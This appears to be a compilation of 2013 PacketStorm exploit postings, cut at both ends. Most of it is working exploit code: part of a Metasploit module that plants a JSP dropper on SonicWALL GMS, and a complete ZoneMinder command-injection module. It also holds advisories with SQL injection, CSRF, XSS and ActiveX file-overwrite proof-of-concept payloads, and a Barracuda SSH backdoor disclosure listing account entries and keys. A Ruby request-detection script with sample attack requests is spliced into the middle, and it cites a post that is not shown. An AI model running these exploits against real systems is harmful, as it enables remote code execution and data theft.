    var_comb         = Rex::Text.rand_text_alpha(rand(8)+8)
    var_exe          = Rex::Text.rand_text_alpha(rand(8)+8)
    @var_hexfile     = Rex::Text.rand_text_alpha(rand(8)+8)
    var_proc         = Rex::Text.rand_text_alpha(rand(8)+8)
    var_fperm        = Rex::Text.rand_text_alpha(rand(8)+8)
    var_fdel         = Rex::Text.rand_text_alpha(rand(8)+8)

    jspraw =  "<%@ page import=\"java.io.*\" %>\n"
    jspraw << "<%\n"
    jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n"
    jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n"
    jspraw << "String #{var_data} = \"\";\n"
    jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
    jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n"
    jspraw << "}\n"
    jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n"
    jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n"
    jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n"
    jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n"
    jspraw << "#{var_inputstream}.read(#{var_bytearray});\n"
    jspraw << "#{var_inputstream}.close();\n"
    jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n"
    jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n"
    jspraw << "{\n"
    jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n"
    jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n"
    jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n"
    jspraw << "#{var_comb} <<= 4;\n"
    jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n"
    jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n"
    jspraw << "}\n"
    jspraw << "#{var_outputstream}.write(#{var_bytes});\n"
    jspraw << "#{var_outputstream}.close();\n"
    jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n"
    jspraw << "String[] #{var_fperm} = new String[3];\n"
    jspraw << "#{var_fperm}[0] = \"chmod\";\n"
    jspraw << "#{var_fperm}[1] = \"+x\";\n"
    jspraw << "#{var_fperm}[2] = #{var_exepath};\n"
    jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n"
    jspraw << "if (#{var_proc}.waitFor() == 0) {\n"
    jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
    jspraw << "}\n"
    # Linux and other UNICES allow removing files while they are in use...
    jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n"
    jspraw << "} else {\n"
    # Windows does not ..
    jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
    jspraw << "}\n"
    jspraw << "%>\n"

    return jspraw
  end

  def get_install_path
    res = send_request_cgi(
      {
        'uri'        => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
        'method'     => 'POST',
        'connection' => 'TE, close',
        'headers'    => {
          'TE' => "deflate,gzip;q=0.3",
        },
        'vars_post'  => {
          'num'      => '123456',
          'action'   => 'show_diagnostics',
          'task'     => 'search',
          'item'     => 'application_log',
          'criteria' => '*.*',
          'width'    => '500'
        }
      })

    if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/
      return $1
    end

    return nil
  end

  def upload_file(location, filename, contents)
    post_data = Rex::MIME::Message.new
    post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"")
    post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"")
    post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"")
    # The filename parameter is what ends up in the multipart part header
    post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"")

    data = post_data.to_s
    data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")

    res = send_request_cgi(
      {
        'uri'        => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1",
        'method'     => 'POST',
        'data'       => data,
        'ctype'      => "multipart/form-data; boundary=#{post_data.bound}",
        'headers'    => {
          'TE' => "deflate,gzip;q=0.3",
        },
        'connection' => 'TE, close'
      })

    if res and res.code == 200 and res.body.empty?
      return true
    else
      return false
    end
  end

  def check
    @peer = "#{rhost}:#{rport}"
    @uri = normalize_uri(target_uri.path)
    @uri << '/' if @uri[-1,1] != '/'

    if get_install_path.nil?
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    @peer = "#{rhost}:#{rport}"
    @uri = normalize_uri(target_uri.path)
    @uri << '/' if @uri[-1,1] != '/'

    # Get Tomcat installation path
    print_status("#{@peer} - Retrieving Tomcat installation path...")
    install_path = get_install_path

    if install_path.nil?
      fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
    end

    print_good("#{@peer} - Tomcat installed on #{install_path}")

    if target['Platform'] == "linux"
      @location = "#{install_path}webapps/appliance/"
    elsif target['Platform'] == "win"
      @location = "#{install_path}webapps\\appliance\\"
    end

    # Upload the JSP and the raw payload
    @jsp_name = rand_text_alphanumeric(8+rand(8))
    jspraw = generate_jsp

    # Specify the payload in hex as an extra file..
    payload_hex = payload.encoded_exe.unpack('H*')[0]

    print_status("#{@peer} - Uploading the payload")
    if upload_file(@location, "#{@var_hexfile}.txt", payload_hex)
      print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt")
    else
      fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload")
    end

    print_status("#{@peer} - Uploading the payload")
    if upload_file(@location, "#{@jsp_name}.jsp", jspraw)
      print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp")
    else
      fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp")
    end

    print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
    res = send_request_cgi(
      {
        'uri'    => "#{@uri}appliance/#{@jsp_name}.jsp",
        'method' => 'GET'
      })

    if res and res.code != 200
      print_warning("#{@peer} - Error triggering the payload")
    end

    register_files_for_cleanup("#{@location}#{@var_hexfile}.txt")
    register_files_for_cleanup("#{@location}#{@jsp_name}.jsp")
  end
end
```

Source: PacketStorm
-
This Metasploit module exploits a command execution vulnerability in ZoneMinder Video Server version 1.24.0 to 1.25.0 which could be abused to allow authenticated users to execute arbitrary commands under the context of the web server user. The 'packageControl' function in the 'includes/actions.php' file calls 'exec()' with user controlled data from the 'runState' parameter.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'ZoneMinder Video Server packageControl Command Execution',
      'Description'    => %q{
          This module exploits a command execution vulnerability in ZoneMinder Video
        Server version 1.24.0 to 1.25.0 which could be abused to allow authenticated
        users to execute arbitrary commands under the context of the web server user.
        The 'packageControl' function in the 'includes/actions.php' file calls 'exec()'
        with user controlled data from the 'runState' parameter.
      },
      'References'     =>
        [
          ['URL', 'http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/'],
        ],
      'Author'         =>
        [
          'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
        ],
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'Arch'           => ARCH_CMD,
      'Platform'       => 'unix',
      'Payload'        =>
        {
          'BadChars' => "\x00",
          'Compat'   =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic telnet python perl bash',
            },
        },
      'Targets'        =>
        [
          ['Automatic Targeting', { 'auto' => true }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => "Jan 22 2013",
    ))

    register_options([
      OptString.new('USERNAME',  [true, 'The ZoneMinder username', 'admin']),
      OptString.new('PASSWORD',  [true, 'The ZoneMinder password', 'admin']),
      OptString.new('TARGETURI', [true, 'The path to the web application', '/zm/'])
    ], self.class)
  end

  def check
    peer = "#{rhost}:#{rport}"
    base = target_uri.path
    base << '/' if base[-1, 1] != '/'
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
    data = "action=login&view=version&username=#{user}&password=#{pass}"

    # login and retrieve software version
    print_status("#{peer} - Authenticating as user '#{user}'")
    begin
      res = send_request_cgi({
        'method' => 'POST',
        'uri'    => "#{base}index.php",
        'cookie' => "#{cookie}",
        'data'   => "#{data}",
      })
      if res and res.code == 200
        if res.body =~ /<title>ZM - Login<\/title>/
          print_error("#{peer} - Authentication failed")
          return Exploit::CheckCode::Unknown
        elsif res.body =~ /v1.2(4\.\d+|5\.0)/
          return Exploit::CheckCode::Appears
        elsif res.body =~ /<title>ZM/
          return Exploit::CheckCode::Detected
        end
      end
      return Exploit::CheckCode::Safe
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_error("#{peer} - Connection failed")
    end
    return Exploit::CheckCode::Unknown
  end

  def exploit
    @peer = "#{rhost}:#{rport}"
    base = target_uri.path
    base << '/' if base[-1, 1] != '/'
    cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    data = "action=login&view=postlogin&username=#{user}&password=#{pass}"
    command = Rex::Text.uri_encode(payload.encoded)

    # login
    print_status("#{@peer} - Authenticating as user '#{user}'")
    begin
      res = send_request_cgi({
        'method' => 'POST',
        'uri'    => "#{base}index.php",
        'cookie' => "#{cookie}",
        'data'   => "#{data}",
      })
      if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/
        fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
    end
    print_good("#{@peer} - Authenticated successfully")

    # send payload
    print_status("#{@peer} - Sending payload (#{command.length} bytes)")
    begin
      res = send_request_cgi({
        'method' => 'POST',
        'uri'    => "#{base}index.php",
        'data'   => "view=none&action=state&runState=start;#{command}%26",
        'cookie' => "#{cookie}"
      })
      if res and res.code == 200
        print_good("#{@peer} - Payload sent successfully")
      else
        fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
    end
  end
end
```

Source: PacketStorm
-
ImageCMS version 4.0.0b suffers from a remote SQL injection vulnerability.

```
Advisory ID: HTB23132
Product: ImageCMS
Vendor: www.imagecms.net
Vulnerable Version(s): 4.0.0b and probably prior
Tested Version: 4.0.0b
Vendor Notification: December 5, 2012
Vendor Patch: January 16, 2013
Public Disclosure: January 23, 2013
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2012-6290
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
```

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in ImageCMS, which can be exploited to perform SQL injection attacks.

1) SQL injection vulnerability in ImageCMS: CVE-2012-6290

The vulnerability exists due to insufficient filtration of the "q" HTTP GET parameter passed to "/admin/admin_search/". A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

Depending on the database and system configuration, the PoC (Proof-of-Concept) code below will create the "/tmp/file.txt" file with the MySQL server version inside:

```
http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202
```

This vulnerability can also be exploited by a remote non-authenticated attacker via a CSRF vector because the application is prone to Cross-Site Request Forgery attacks. In order to do so the attacker should trick a logged-in administrator into visiting a web page with the CSRF exploit.

Basic CSRF exploit example:

```html
<img src="http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202">
```

-----------------------------------------------------------------------------------------------

Solution:

Upgrade to ImageCMS 4.2

More Information:
http://forum.imagecms.net/viewtopic.php?id=1436
http://www.imagecms.net/blog/news/reliz-imagecms-42-razgranichenie-prav-dostupa-i-drugie-novinki

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23132 - https://www.htbridge.com/advisory/HTB23132 - SQL Injection Vulnerability in ImageCMS.
[2] ImageCMS - http://www.imagecms.net - A free modern Web 3.0 content management system.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Source: PacketStorm
-
gpEasy versions 3.5.2 and below suffer from a cross site scripting vulnerability.

```
Advisory ID: HTB23137
Product: gpEasy
Vendor: gpeasy
Vulnerable Version(s): 3.5.2 and probably prior
Tested Version: 3.5.2
Vendor Notification: January 2, 2013
Vendor Patch: January 2, 2013
Public Disclosure: January 23, 2013
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2013-0807
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
```

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in gpEasy, which can be exploited to perform Cross-Site Scripting (XSS) attacks.

1) Cross-Site Scripting (XSS) in gpEasy: CVE-2013-0807

The vulnerability exists due to insufficient sanitisation of user-supplied data in the "section" HTTP GET parameter passed to the "index.php" script. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.

The exploitation example below uses the "alert()" JavaScript function to display the administrator's cookies:

```
http://[host]/?cmd=new_section&section=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
```

-----------------------------------------------------------------------------------------------

Solution:

Upgrade the "include/tool/editing_page.php" script to the latest version from GitHub.

More Information:
https://github.com/oyejorge/gpEasy-CMS/commit/40f1b4a5749a621cd27c5ca39900dbcf8701969d

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23137 - https://www.htbridge.com/advisory/HTB23137 - Cross-Site Scripting (XSS) vulnerability in gpEasy.
[2] gpEasy - http://gpeasy.com - gpEasy is a complete and easy to use Content Management System written in PHP.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Source: PacketStorm
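The five posts above all describe a request whose shape is distinctive: a POST to mt-upgrade.cgi naming a migration step, the SonicWALL GMS "appliance" application reached with skipSessionCheck=1, a ZoneMinder runState value carrying shell metacharacters, an ImageCMS admin_search "q" parameter containing UNION SELECT / INTO OUTFILE, and a gpEasy new_section "section" value carrying a script tag. The Ruby below is an added example, not code from any of the posts or from the projects they describe, that parses raw HTTP requests (constructed samples, not captured traffic) and reports which of those indicators each request matches; the sample requests, rule names and helper functions are mine. It is written for a proxy or WAF log where the full request, body included, is available, which is why the POST-only cases can be covered.

```ruby
require 'uri'

# Constructed raw HTTP requests (not captured traffic) modelled on the request
# shapes the posts above describe, plus one benign request as a control.
SAMPLE_REQUESTS = {
  'movable_type' =>
    "POST /mt/mt-upgrade.cgi HTTP/1.1\r\nHost: blog.example\r\n" \
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n" \
    "__mode=run_actions&installing=1&steps=%5B%5B%22core_drop_meta_for_table%22%2C%22class%22%2C%22v0%22%5D%5D",
  'sonicwall_gms' =>
    "POST /appliance/applianceMainPage?skipSessionCheck=1 HTTP/1.1\r\nHost: gms.example\r\n" \
    "Content-Type: multipart/form-data; boundary=xyz\r\n\r\n--xyz--",
  'zoneminder' =>
    "POST /zm/index.php HTTP/1.1\r\nHost: cam.example\r\nCookie: ZMSESSID=abc\r\n" \
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n" \
    "view=none&action=state&runState=start;CONSTRUCTED%26",
  'imagecms' =>
    "GET /admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202 HTTP/1.1\r\n" \
    "Host: cms.example\r\n\r\n",
  'gpeasy' =>
    "GET /?cmd=new_section&section=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1\r\n" \
    "Host: site.example\r\n\r\n",
  'benign' =>
    "GET /zm/index.php?view=console HTTP/1.1\r\nHost: cam.example\r\nCookie: ZMSESSID=abc\r\n\r\n",
}

Request = Struct.new(:verb, :path, :query, :headers, :body) do
  # Query-string and (for urlencoded bodies) form parameters, URL-decoded.
  # Body values win when a key appears in both. Multipart bodies are not parsed.
  def params
    merged = URI.decode_www_form(query.to_s).to_h
    if headers['content-type'].to_s.start_with?('application/x-www-form-urlencoded')
      merged.merge!(URI.decode_www_form(body.to_s).to_h)
    end
    merged
  end
end

# Minimal HTTP/1.x request parser: start line, headers, optional body.
def parse_request(raw)
  head, body = raw.split(/\r?\n\r?\n/, 2)
  lines = head.split(/\r?\n/)
  verb, target, _version = lines.shift.split(' ', 3)
  path, query = target.split('?', 2)
  headers = lines.each_with_object({}) do |line, h|
    name, value = line.split(':', 2)
    h[name.strip.downcase] = value.to_s.strip
  end
  Request.new(verb, path, query, headers, body)
end

SHELL_META = /[;&|`$]/

# Each rule is [name, predicate]; the indicators come from the posts above.
RULES = [
  ['Movable Type mt-upgrade.cgi migration step invoked (CVE-2013-0209)',
   ->(r) { r.verb == 'POST' && r.path.end_with?('/mt-upgrade.cgi') &&
           r.params['__mode'] == 'run_actions' &&
           r.params['steps'].to_s.include?('core_drop_meta_for_table') }],
  ['SonicWALL GMS appliance app reached with skipSessionCheck=1 (CVE-2013-1359)',
   ->(r) { r.path.include?('/appliance/applianceMainPage') && r.params['skipSessionCheck'] == '1' }],
  ['ZoneMinder runState carrying shell metacharacters (packageControl exec)',
   ->(r) { r.path.end_with?('/index.php') && r.params['action'] == 'state' &&
           r.params['runState'].to_s.match?(SHELL_META) }],
  ['ImageCMS admin_search q with SQL injection (CVE-2012-6290)',
   ->(r) { r.path.include?('/admin/admin_search') &&
           r.params['q'].to_s.match?(/union\s+select|into\s+outfile/i) }],
  ['gpEasy new_section with script injection in section (CVE-2013-0807)',
   ->(r) { r.params['cmd'] == 'new_section' &&
           r.params['section'].to_s.match?(/<script|on\w+\s*=/i) }],
]

# Names of every rule the request triggers (empty array when clean).
def matching_rules(raw)
  req = parse_request(raw)
  RULES.select { |_name, test| test.call(req) }.map(&:first)
end

def scan_requests(requests)
  requests.transform_values { |raw| matching_rules(raw) }
end

if __FILE__ == $0
  scan_requests(SAMPLE_REQUESTS).each do |label, hits|
    puts "#{label}: #{hits.empty? ? 'clean' : hits.join('; ')}"
  end
end
```

The rules key on the parameters after URL decoding, so the `%27`/`%3C` encodings in the advisories' PoC URLs do not hide the payloads; the ZoneMinder rule deliberately looks for shell metacharacters in `runState` rather than a specific command, since the module above accepts any cmd payload.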
-
Aloaha PDF Crypter version 3.5.0.1164 suffers from an active-x arbitrary file overwrite vulnerability.

```
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

============================================================================================
 TITLE:
============================================================================================
 Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite

 url: http://www.aloaha.com/
 download: http://www.aloaha.com/download/aloaha_crypter.zip
 author: shinnai (http://shinnai.altervista.org)
============================================================================================
 FILE INFO:
============================================================================================
 File: C:\WINDOWS\system32\vbCrypt.dll
 InternalName: ebCrypt
 OriginalFilename: ebCrypt.DLL
 FileVersion: 2.0.0.2087
 FileDescription: ebCrypt Main Module
 Product: ebCrypt
 ProductVersion: 2.0.0.2087
 Language: English (United States)
 MD5 hash: b262cb93c555c3c9604502d071a783ec
============================================================================================
 ACTIVEX INFO:
============================================================================================
 ProgID: EbCrypt.eb_c_PRNGenerator.1
 GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}
 Description: eb_c_PRNGenerator Class
 Safety report:
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe: Safe for untrusted: caller,data
============================================================================================
 BUG:
============================================================================================
 This activex contains the "SaveToFile" method which could be used to overwrite arbitrary files on users' PCs.
============================================================================================
 PROOF OF CONCEPT
============================================================================================
<html>
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>
<script language='vbscript'>
test.SaveToFile "c:\windows\_system.ini"
</script>
</html>
============================================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (MingW32)

iQIcBAEBAgAGBQJQ/6sFAAoJEJlK/ai8vywmSUUQAK38iSzcZ3JsD+Kskt1Zwvhc
hynADNu17uvlcaUoK7uFc8BwOkRT6XqlmJe6Gab02jPClkmaHRH0Oh8/Zxu8T5Y5
TsLrw7YgUFQDelS4zL7yxZIKofio3GVS55vo3JL1bJvKrANp99BYcQFX4t5539g9
l/kYf51QGhWXxEvYFlSpDZ8km8dCElLYTT47oFjXMFSpBHyodrU4MPh4FGLoN1XN
TLrYDOoTke+RXit/nzNKqbNzXIXmBVTBWfYdPLWwcc07Go4KR3tKGl1ELSCczHeg
PFWCbcJ18l56809afAviUUvrgb1g9WG9ZY5jMxXP1t5oqeeLJKfKhX0KipVtoBUa
dZZWJOLp6Mmi8VBzfkTu50jZy1B4EtUSTlmj5A2SKBQRM/0SSqZO1LjwE39fQ9gh
6avUHhPgV9OLqaWxVbNHy6RYBFYHlo46ytvIhgBDU0VPqwI50yyzrObxbRAhCD19
GjgSBtZqOJQ9sFwiXS+HHQcCt8ZR6pf09yWmxDr+1L7D4yKvq/Z2TsBuYKMUGazW
Xni6lxddI7LUN88LXlrV8cCoJ7R2gBe9Tg3nUBIDLpXM4hyeU1DTL0kFNATUk3P5
7xFde64BvKL2GAzEip8j9PuGhezfflIIhsxPHUEemOvsUctqXEQI8DtC0GkRaT3J
enDko6b3T5jOt6axrWGb
=H+Gh
-----END PGP SIGNATURE-----
```

Source: PacketStorm
-
Multiple Barracuda Networks products suffer from having static backdoor accounts that allow for remote administrative access via SSH. SEC Consult Vulnerability Lab Security Advisory < 20130124-0 > ======================================================================= title: Critical SSH Backdoor in multiple Barracuda Networks Products vulnerable products: Barracuda Spam and Virus Firewall Barracuda Web Filter Barracuda Message Archiver Barracuda Web Application Firewall Barracuda Link Balancer Barracuda Load Balancer Barracuda SSL VPN (all including their respective virtual "Vx" versions) vulnerable version: all versions < Security Definition 2.0.5 fixed version: Security Definition 2.0.5 impact: Critical homepage: https://www.barracudanetworks.com/ found: 2012-11-20 by: S. Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: ----------------------------- URL: https://www.barracudanetworks.com/products/ Vulnerability overview/description: ----------------------------------- 1) Backdoor accounts Several undocumented operating system user accounts exist on the appliance. They can be used to gain access to the appliance via the terminal but also via SSH. (see 2) These accounts are undocumented and can _not_ be disabled! 2) Remote access via SSH An SSH daemon runs on the appliance, but network filtering (iptables) is used to only allow access from whitelisted IP ranges (private and public). The public ranges include servers run by Barracuda Networks Inc. but also servers from other, unaffiliated entities - all of whom can access SSH on all affected Barracuda Networks appliances exposed to the Internet. The backdoor accounts from 1) can be used to gain shell access. This functionality is entirely undocumented and can only be disabled via a hidden 'expert options' dialog (see Workaround). 
Proof of concept: ----------------- URLs and other exploit code (passwords) have been removed from this advisory. A detailed advisory will be released within a month including the omitted information. 1) Backdoor accounts The passwd and shadow file show that the following accounts exist. Some passwords could be recovered (short attack with tiny wordlist): root:x:0:0:root:/root:/bin/bash <-- UID: 0! <hash removed> NOT CRACKED during given time (confirmed static in tested appliances) build:x:0:0:Build User:/root:/boot/os_tools/clone_interactive.pl <-- UID: 0! <hash removed> NOT CRACKED during given time shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown -h now <hash removed> CRACKED <password removed> product:x:700:100::/home/product:/bin/bash <hash removed> CRACKED <password removed> ca:x:704:65534:ACL reset user:/home/ca:/home/emailswitch/code/firmware/current/bin/clear_acls.sh <hash removed> CRACKED <password removed> support:x:705:705::/home/support:/home/product/code/firmware/current/bin/request_support.pl <hash removed> CRACKED <password removed> websupport:x:706:706::/home/websupport:/home/emailswitch/code/firmware/current/bin/request_web.pl <hash removed> CRACKED <password removed> qa_test:x:707:707::/home/qa_test:/root/qa_test1.pl <hash removed> NOT CRACKED during given time The following users have public keys added to their authorized_keys file: remote:x:0:0:Remote Access:/home/remote:/bin/bash <-- UID: 0! 
# cat /home/remote/.ssh/authorized_keys2 ssh-dss AAAAB3NzaC1kc3MAAACBAM3angjOeIjCePKw8a/zTugPKK+hoYkpQhyXY8+BN q14nCInlcrzhavCiQCVKNTVtpW0A2hs75/QGslwrTpulsX89ZQL0Wx915iNbaf0P5sXoU rA0iPoPoL3nIXWskjc6xj+x66svIVHxiBYpnTSaBNaJhxU5/3eK+/3sSPrAR0NAAAAFQD u09YU0d2eG63v+zHmSIKCMZ8vnwAAAIAPaB34rhWjIRE5hz6YxU8jeEnPZPr3ZX8hbshk asrrcQG+L0UeTGKoL7JTYQ2vu/549xXBpheiTAKunYES6RwURziz11vq6oWix3Wo6GGOb yS53MIbyyc4DrB4zLDUI4PJFLBxwKTOBOSU7OuCH7sQ6rzaMrsDZIf6GxeTrDIN1gAAAI AlkA1hEFFmRh7SfOkN4oGFcvZl/71PTEXnK3HZZopYW5WIqueTl6NALiq6FobY+U8b/NQ ibvXXEinLP6dgqd/xnYYhwoUMuP5GPDhUkl+xKoBjAd+33yT4AN1ymWx/LZZ+9uQXt08k Q3sgpXBhW6YT+rqrJLgc9l3Y2/exVGJjYA== manager@support01.barracudanetwo rks.com cluster:x:1000:1000::/home/cluster:/bin/bash # cat /home/cluster/.ssh/authorized_keys2 ssh-dss AAAAB3NzaC1kc3MAAACBAJ5O8UhVP3lb0Mff66uHMkvcZlxPJF/7pgtcq5Qd/ 7cuwqv65/BiDU2oNOWAIfaO89K+kLvrt+VY3TdemTrcRGiTZfzXeRASB9wWVI7rPPsIYs S47lBEp7PYJANWXd6rYgfTw3fr1PYHpUBDgxOcHshmL469lDDbx6CodrwgK4e/AAAAFQD a/pjlqnKmBtWNqBXB89J3qhb06QAAAIAiQCodsX5QqA8TBP6scOYIckkHiUbIireamxVa U587P7uthFiMVnKrj9MTzwgFebTQQ02B9LQpXfmMdQdZi2Hb8FCwP1cuxp0yAHKqYh3ss hCzhDq2lrw1NrAVlrkp4dqj0lvwEUp3BYf9VnveylrfiHA45hyXdXdzfxdn7/CDQQAAAI AOtKcLIsZ30Y4HG0Qk4cYqKw8QryvS36xbvywX7Tq8/7N5D0LrjaCzBYo8cBIBxHjpePT D7pOSgUiuXk16y8ffTYzLexSqL0wFLV5GIIxAeXhtCtIUPVXRZzTm97NiErikbfjDRx0P PZKcOH8A1LX4Y0nLoBbnNnPvhcIXfElkow== At least the user "product" can be used to login and get a shell on the appliance. It was confirmed that this user can access the MySQL database (root@localhost with no password) eg. to add new users with administrative privileges to the appliance configuration. Furthermore it was possible to enable diagnostic/debugging functionality which could be used to gain root access on the system. 
(confirmed in Barracuda SSL VPN)

2) Remote access via SSH

An /etc/sysconfig/iptables file shows which rules are in place:

```
# Generated by iptables-save v1.2.7a on Thu Oct 9 16:39:19 2003
*nat
:PREROUTING ACCEPT [4012:488438]
:POSTROUTING ACCEPT [641:40599]
:OUTPUT ACCEPT [641:40599]
COMMIT
# Completed on Thu Oct 9 16:39:19 2003
# Generated by iptables-save v1.2.7a on Thu Oct 9 16:39:19 2003
*filter
:INPUT ACCEPT [42408:13197223]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [49685:7341128]
-A INPUT -s localhost -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.200.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.200.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -s 192.168.10.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.10.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
